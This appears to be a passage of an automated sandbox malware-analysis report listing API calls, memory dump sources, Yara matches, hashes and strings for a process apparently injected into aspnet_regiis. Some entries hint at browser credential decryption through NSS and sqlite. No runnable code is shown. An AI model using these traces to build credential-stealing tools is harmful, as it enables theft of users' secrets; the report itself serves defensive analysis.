                                                                                                                                                                              • PR_Unlock.NSS3(?), ref: 6CBA8D2E
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE00F,00000000), ref: 6CBA8D62
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CBA8D93
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Time$ErrorSystem$CriticalEnterFileSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strlen
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3131193014-0
                                                                                                                                                                              • Opcode ID: 530dd6b87eed08630f0f304fed26b3cd51761b099f35a189a59d815f790037b9
                                                                                                                                                                              • Instruction ID: 2a6f2456304fb6bf3a2093306bf578c650526b9a91efd2c6bcfbf41f086fd4cd
                                                                                                                                                                              • Opcode Fuzzy Hash: 530dd6b87eed08630f0f304fed26b3cd51761b099f35a189a59d815f790037b9
                                                                                                                                                                              • Instruction Fuzzy Hash: A7316A71E04291AFE700AFA8DC4079AB7B4FF15318F14013AEA9567F50E732A925CBD2
                                                                                                                                                                              APIs
                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(?,6CBECD93,?), ref: 6CBECEEE
                                                                                                                                                                                • Part of subcall function 6CBE14C0: TlsGetValue.KERNEL32 ref: 6CBE14E0
                                                                                                                                                                                • Part of subcall function 6CBE14C0: EnterCriticalSection.KERNEL32 ref: 6CBE14F5
                                                                                                                                                                                • Part of subcall function 6CBE14C0: PR_Unlock.NSS3 ref: 6CBE150D
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBECD93,?), ref: 6CBECEFC
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBECD93,?), ref: 6CBECF0B
                                                                                                                                                                                • Part of subcall function 6CBE0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBE08B4
                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBECD93,?), ref: 6CBECF1D
                                                                                                                                                                                • Part of subcall function 6CBDFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6CBD8D2D,?,00000000,?), ref: 6CBDFB85
                                                                                                                                                                                • Part of subcall function 6CBDFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6CBDFBB1
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF47
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF67
                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,00000000,6CBECD93,?,?,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF78
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Arena$Alloc_$Value$CopyCriticalEnterItem_SectionUnlock$AllocateErrorFindMark_Tag_memcpy
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4291907967-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • TlsGetValue.KERNEL32 ref: 6CB98C1B
                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 6CB98C34
                                                                                                                                                                              • PL_ArenaAllocate.NSS3 ref: 6CB98C65
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CB98C9C
                                                                                                                                                                              • PR_Unlock.NSS3 ref: 6CB98CB6
                                                                                                                                                                                • Part of subcall function 6CC2DD70: TlsGetValue.KERNEL32 ref: 6CC2DD8C
                                                                                                                                                                                • Part of subcall function 6CC2DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CC2DDB4
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CriticalSectionUnlockValue$AllocateArenaEnterLeave
                                                                                                                                                                              • String ID: KRAM
                                                                                                                                                                              • API String ID: 4127063985-3815160215
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_EnterMonitor.NSS3 ref: 6CC92CA0
                                                                                                                                                                              • PR_ExitMonitor.NSS3 ref: 6CC92CBE
                                                                                                                                                                              • calloc.MOZGLUE(00000001,00000014), ref: 6CC92CD1
                                                                                                                                                                              • strdup.MOZGLUE(?), ref: 6CC92CE1
                                                                                                                                                                              • PR_LogPrint.NSS3(Loaded library %s (static lib),00000000), ref: 6CC92D27
                                                                                                                                                                              Strings
                                                                                                                                                                              • Loaded library %s (static lib), xrefs: 6CC92D22
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Monitor$EnterExitPrintcallocstrdup
                                                                                                                                                                              • String ID: Loaded library %s (static lib)
                                                                                                                                                                              • API String ID: 3511436785-2186981405
                                                                                                                                                                              APIs
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Name::operator+$NameName::
                                                                                                                                                                              • String ID: throw(
                                                                                                                                                                              • API String ID: 168861036-3159766648
                                                                                                                                                                              APIs
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC23046
                                                                                                                                                                                • Part of subcall function 6CC0EE50: PR_SetError.NSS3(FFFFE013,00000000), ref: 6CC0EE85
                                                                                                                                                                              • PK11_AEADOp.NSS3(?,00000004,?,?,?,?,?,00000000,?,B8830845,?,?,00000000,6CBF7FFB), ref: 6CC2312A
                                                                                                                                                                              • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CC23154
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CC22E8B
                                                                                                                                                                                • Part of subcall function 6CC2C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6CC2C2BF
                                                                                                                                                                                • Part of subcall function 6CC0F110: PR_SetError.NSS3(FFFFE013,00000000,00000000,0000A48E,00000000,?,6CBF9BFF,?,00000000,00000000), ref: 6CC0F134
                                                                                                                                                                              • memcpy.VCRUNTIME140(8B3C75C0,?,6CBF7FFA), ref: 6CC22EA4
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CC2317B
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Error$memcpy$K11_Value
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2334702667-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 6CBEC6B0: SECOID_FindOID_Util.NSS3(00000000,00000004,?,6CBEDAE2,?), ref: 6CBEC6C2
                                                                                                                                                                              • PR_Now.NSS3 ref: 6CBECD35
                                                                                                                                                                                • Part of subcall function 6CC49DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DC6
                                                                                                                                                                                • Part of subcall function 6CC49DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6CC90A27), ref: 6CC49DD1
                                                                                                                                                                                • Part of subcall function 6CC49DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6CC49DED
                                                                                                                                                                                • Part of subcall function 6CBD6C00: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB81C6F,00000000,00000004,?,?), ref: 6CBD6C3F
                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBECD54
                                                                                                                                                                                • Part of subcall function 6CC49BF0: TlsGetValue.KERNEL32(?,?,?,6CC90A75), ref: 6CC49C07
                                                                                                                                                                                • Part of subcall function 6CBD7260: PR_SetError.NSS3(FFFFE005,00000000,?,?,00000000,00000000,00000000,?,6CB81CCC,00000000,00000000,?,?), ref: 6CBD729F
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CBECD9B
                                                                                                                                                                              • PORT_ArenaGrow_Util.NSS3(00000000,?,?,?), ref: 6CBECE0B
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(00000000,00000010), ref: 6CBECE2C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE10F3
                                                                                                                                                                                • Part of subcall function 6CBE10C0: EnterCriticalSection.KERNEL32(?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE110C
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1141
                                                                                                                                                                                • Part of subcall function 6CBE10C0: PR_Unlock.NSS3(?,?,?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE1182
                                                                                                                                                                                • Part of subcall function 6CBE10C0: TlsGetValue.KERNEL32(?,6CB88802,00000000,00000008,?,6CB7EF74,00000000), ref: 6CBE119C
                                                                                                                                                                              • PORT_ArenaMark_Util.NSS3(00000000), ref: 6CBECE40
                                                                                                                                                                                • Part of subcall function 6CBE14C0: TlsGetValue.KERNEL32 ref: 6CBE14E0
                                                                                                                                                                                • Part of subcall function 6CBE14C0: EnterCriticalSection.KERNEL32 ref: 6CBE14F5
                                                                                                                                                                                • Part of subcall function 6CBE14C0: PR_Unlock.NSS3 ref: 6CBE150D
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaMark_Util.NSS3(?,6CBECD93,?), ref: 6CBECEEE
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000018,?,6CBECD93,?), ref: 6CBECEFC
                                                                                                                                                                                • Part of subcall function 6CBECEE0: SECOID_FindOIDByTag_Util.NSS3(00000023,?,?,?,6CBECD93,?), ref: 6CBECF0B
                                                                                                                                                                                • Part of subcall function 6CBECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,00000000,?,?,?,?,6CBECD93,?), ref: 6CBECF1D
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF47
                                                                                                                                                                                • Part of subcall function 6CBECEE0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF67
                                                                                                                                                                                • Part of subcall function 6CBECEE0: SECITEM_CopyItem_Util.NSS3(?,00000000,6CBECD93,?,?,?,?,?,?,?,?,?,?,?,6CBECD93,?), ref: 6CBECF78
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Arena$Alloc_Value$Item_Time$CopyCriticalEnterErrorFindMark_SectionSystemUnlock$AllocateCurrentFileGrow_Tag_ThreadUnothrow_t@std@@@Zfree__ehfuncinfo$??2@
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3748922049-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,00000004), ref: 6CBBEF38
                                                                                                                                                                                • Part of subcall function 6CBA9520: PK11_IsLoggedIn.NSS3(00000000,?,6CBD379E,?,00000001,?), ref: 6CBA9542
                                                                                                                                                                              • PK11_Authenticate.NSS3(?,00000001,?), ref: 6CBBEF53
                                                                                                                                                                                • Part of subcall function 6CBC4C20: TlsGetValue.KERNEL32 ref: 6CBC4C4C
                                                                                                                                                                                • Part of subcall function 6CBC4C20: EnterCriticalSection.KERNEL32(?), ref: 6CBC4C60
                                                                                                                                                                                • Part of subcall function 6CBC4C20: PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CA1
                                                                                                                                                                                • Part of subcall function 6CBC4C20: TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CBE
                                                                                                                                                                                • Part of subcall function 6CBC4C20: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4CD2
                                                                                                                                                                                • Part of subcall function 6CBC4C20: realloc.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBC4D3A
                                                                                                                                                                              • PR_GetCurrentThread.NSS3 ref: 6CBBEF9E
                                                                                                                                                                                • Part of subcall function 6CC49BF0: TlsGetValue.KERNEL32(?,?,?,6CC90A75), ref: 6CC49C07
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBBEFC3
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE001,00000000), ref: 6CBBF016
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CBBF022
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_Value$AuthenticateCriticalEnterSectionfree$CurrentErrorLoggedThreadUnlockrealloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2459274275-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2652573382.0000000002A30000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A3D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A67000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002A6B000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B5D000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B63000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002B82000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002BA1000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2652612690.0000000002C3A000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2653443915.0000000002C70000.00000002.00000400.00020000.00000000.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: strtok_s
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3330995566-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(?,00000000,00000001,00000000,?,?,6CB82D1A), ref: 6CB92E7E
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6CB88298,?,?,?,6CB7FCE5,?), ref: 6CBE07BF
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PL_HashTableLookup.NSS3(?,?), ref: 6CBE07E6
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBE081B
                                                                                                                                                                                • Part of subcall function 6CBE07B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6CBE0825
                                                                                                                                                                              • PR_Now.NSS3 ref: 6CB92EDF
                                                                                                                                                                              • CERT_FindCertIssuer.NSS3(?,00000000,?,0000000B), ref: 6CB92EE9
                                                                                                                                                                              • SECOID_FindOID_Util.NSS3(-000000D8,?,?,?,?,6CB82D1A), ref: 6CB92F01
                                                                                                                                                                              • CERT_DestroyCertificate.NSS3(?,?,?,?,?,?,6CB82D1A), ref: 6CB92F50
                                                                                                                                                                              • SECITEM_CopyItem_Util.NSS3(?,?,?), ref: 6CB92F81
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              • Associated: 00000003.00000002.2680509045.000000006CB00000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680720904.000000006CC9F000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680807353.000000006CCDE000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680870106.000000006CCDF000.00000008.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680890543.000000006CCE0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              • Associated: 00000003.00000002.2680908405.000000006CCE5000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FindUtil$ErrorHashLookupTable$CertCertificateConstCopyDestroyIssuerItem_
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 287051776-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CERT_DecodeAVAValue.NSS3(?,?,6CB80A2C), ref: 6CB80E0F
                                                                                                                                                                              • PORT_ArenaAlloc_Util.NSS3(?,00000001,?,?,6CB80A2C), ref: 6CB80E73
                                                                                                                                                                              • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,6CB80A2C), ref: 6CB80E85
                                                                                                                                                                              • PORT_ZAlloc_Util.NSS3(00000001,?,?,6CB80A2C), ref: 6CB80E90
                                                                                                                                                                              • free.MOZGLUE(00000000), ref: 6CB80EC4
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001,?,?,?,6CB80A2C), ref: 6CB80ED9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Util$Alloc_$ArenaDecodeItem_ValueZfreefreememset
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3618544408-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • PR_SetError.NSS3(FFFFE013,00000000), ref: 6CC0EE85
                                                                                                                                                                              • realloc.MOZGLUE(55CEB38C,?), ref: 6CC0EEAE
                                                                                                                                                                              • PORT_Alloc_Util.NSS3(?), ref: 6CC0EEC5
                                                                                                                                                                                • Part of subcall function 6CBE0BE0: malloc.MOZGLUE(6CBD8D2D,?,00000000,?), ref: 6CBE0BF8
                                                                                                                                                                                • Part of subcall function 6CBE0BE0: TlsGetValue.KERNEL32(6CBD8D2D,?,00000000,?), ref: 6CBE0C15
                                                                                                                                                                              • htonl.WSOCK32(?), ref: 6CC0EEE3
                                                                                                                                                                              • htonl.WSOCK32(00000000,?), ref: 6CC0EEED
                                                                                                                                                                              • memcpy.VCRUNTIME140(?,?,?,00000000,?), ref: 6CC0EF01
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: htonl$Alloc_ErrorUtilValuemallocmemcpyrealloc
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1351805024-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBBEE49
                                                                                                                                                                                • Part of subcall function 6CBDFAB0: free.MOZGLUE(?,-00000001,?,?,6CB7F673,00000000,00000000), ref: 6CBDFAC7
                                                                                                                                                                              • SECITEM_AllocItem_Util.NSS3(00000000,00000000,?), ref: 6CBBEE5C
                                                                                                                                                                              • PK11_CreateContextBySymKey.NSS3(?,00000104,?,?), ref: 6CBBEE77
                                                                                                                                                                              • PK11_CipherOp.NSS3(00000000,?,00000008,?,?,?), ref: 6CBBEE9D
                                                                                                                                                                              • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBBEEB3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: K11_$ContextItem_Util$AllocCipherCreateDestroyZfreefree
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 886189093-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • StrStrA.SHLWAPI(?,00000000,?,?,?,02A13794,00000000,00000010), ref: 02A12119
                                                                                                                                                                              • lstrcpyn.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 02A12132
                                                                                                                                                                              • lstrlen.KERNEL32(?), ref: 02A12144
                                                                                                                                                                              • wsprintfA.USER32 ref: 02A12156
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: lstrcpynlstrlenwsprintf
                                                                                                                                                                              • String ID: %s%s$C:\Users\user\Desktop\
                                                                                                                                                                              • API String ID: 1206339513-1572652216
                                                                                                                                                                              APIs
                                                                                                                                                                              • sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CDD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CB6AFDA
                                                                                                                                                                              Strings
                                                                                                                                                                              • unable to delete/modify collation sequence due to active statements, xrefs: 6CB6AF5C
                                                                                                                                                                              • misuse, xrefs: 6CB6AFCE
                                                                                                                                                                              • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CB6AFC4
                                                                                                                                                                              • %s at line %d of [%.10s], xrefs: 6CB6AFD3
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2680557008.000000006CB01000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6CB00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_6cb00000_aspnet_regiis.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: sqlite3_log
                                                                                                                                                                              • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                              • API String ID: 632333372-924978290
                                                                                                                                                                              APIs
                                                                                                                                                                              • _memset.LIBCMT ref: 02A08307
                                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,-0000001F,00000000,?,?), ref: 02A0833C
                                                                                                                                                                              Strings
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000003.00000002.2652497824.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_3_2_2a00000_aspnet_regiis.jbxd
                                                                                                                                                                              Yara matches
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocLocal_memset
                                                                                                                                                                              • String ID: ERROR_RUN_EXTRACTOR$v10$v20
                                                                                                                                                                              • API String ID: 52611349-380572819
                                                                                                                                                                              • Opcode ID: 8552555a36376632f7d8bce6af92106ced6a54857972e450cf2145b3482188ae
                                                                                                                                                                              • Instruction ID: 9d8b5b708447c309911f84c4886ef015a52dc7043636ab3a5a654dad80c0dd7a
                                                                                                                                                                              • Opcode Fuzzy Hash: 8552555a36376632f7d8bce6af92106ced6a54857972e450cf2145b3482188ae
                                                                                                                                                                              • Instruction Fuzzy Hash: 4E4106B2A40208AFDB10DFB5DC81ADE7BB8AF44324F144561FD05E7184EF74D9458B95
                                                                                                                                                                              APIs
                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 02A0F2C7
                                                                                                                                                                                • Part of subcall function 02A2EC45: std::exception::exception.LIBCMT ref: 02A2EC5A
